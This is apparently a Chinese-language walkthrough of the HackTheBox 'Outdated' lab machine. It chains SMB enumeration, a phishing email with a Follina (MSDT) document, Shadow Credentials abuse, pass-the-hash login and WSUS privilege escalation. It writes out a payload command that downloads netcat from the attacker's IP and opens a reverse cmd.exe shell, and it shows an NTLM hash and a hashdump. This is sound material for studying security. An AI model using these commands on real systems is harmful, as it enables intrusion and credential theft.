基本信息
端口扫描
windows域环境,没有web:
1 | nmap -sC -sV -Pn 10.10.11.175 |
enum4linux
也没什么信息
1 | sudo enum4linux 10.10.11.175 |
SMB
smb可以发现一些信息:
1 | └─$ smbclient -N -L 10.10.11.175 |
share
share目录里得到一个pdf:
1 | └─$ smbclient -N //10.10.11.175/Shares |
NOC_Reminder.pdf
pdf里给出了一个邮箱地址和一些未修复的漏洞编号,“把任何内部网络应用的链接发到itsupport@outdated.htb,这样我们就可以把它们重新添加到我们的监控平台,以便发出警报和通知”,大概是这个意思,也就是说我们发送的链接会被自动点开,然后未修复的漏洞里大大的MSDT:
SMTP + follina
生成恶意文件,发送邮件:
- JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload
https://github.com/JohnHammond/msdt-follina
代码需要稍微改一下:
1 | command = f"""Invoke-WebRequest http://<your-ip>/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe <your-ip> {args.reverse}""" |
然后运行,生成恶意文件,作为附件发送邮件
1 | python3 follina.py -i 10.10.14.12 --port 80 --reverse 4444 |
机器不稳定,这里可能需要多次重置,最终得到btables用户shell
BloodHound
上传sharphound收集信息,下载下来分析
1 | download SharpHound to the target |
分析输出发现 btables 属于组 itstaff,并且 itstaff 有权将AddKeyCredentialLink 链接到对 DC具有psremote 访问权限的用户 sflowers
Shadow Credentials
根据bloodhound提示信息一步步来,首先需要利用Shadow Credentials得到sflower:
- Shadow Credentials - Red Teaming Experiments
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
基本上,我们可以为用户 sflowers添加新属性,因此,我们可以添加一个新属性作为用户 sflowers 进行身份验证的有效凭证,然后我们可以使用我们创建的新凭证来拉取sflowers 的 TGT,我们可以作为 sflowers 用于持久访问
需要用到的工具,其中Whisker可以从这个文件中提取:
- https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Whisker.ps1
- r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
按照资料中的步骤,一步步来:
1 | 添加属性,得到rubeus命令 |
sflowers & user flag
然后就可以直接使用得到的hash登录sflowers用户,桌面得到user flag:
1 | evil-winrm -i 10.10.11.175 -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5 |
提权信息
运行winpeas,发现可能利用的WSUS:
检查确认满足利用条件,一个非https的wsus服务器,UseWUServer值为1,机器容易受到wsus攻击。
- Windows Local Privilege Escalation - HackTricks
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
1 | reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer |
提权 & root flag
利用WSUS执行任意命令,例如修改管理员密码:
- PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#wsus-deployment
1 | # 创建更新 |
然后就可以使用修改后的密码登录:
root flag
桌面得到root.txt:
Hashdump
这里716f1ce2e2cf38ee1210cce35eb78cb6是原本的hash,并不是我修改后的密码hash:
1 | meterpreter > hashdump |
参考资料
- JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload
https://github.com/JohnHammond/msdt-follina - Shadow Credentials - Red Teaming Experiments
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Whisker.ps1
- r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries - Windows Local Privilege Escalation - HackTricks
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus - PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#wsus-deployment - Outdated - HTB | BreachForums
https://breached.to/Thread-Outdated-HTB - HackTheBox (HTB) Writeup: Outdated [Medium] – meowmeowattack
https://meowmeowattack.wordpress.com/2022/08/17/hackthebox-htb-writeup-walkthrough-outdated-medium/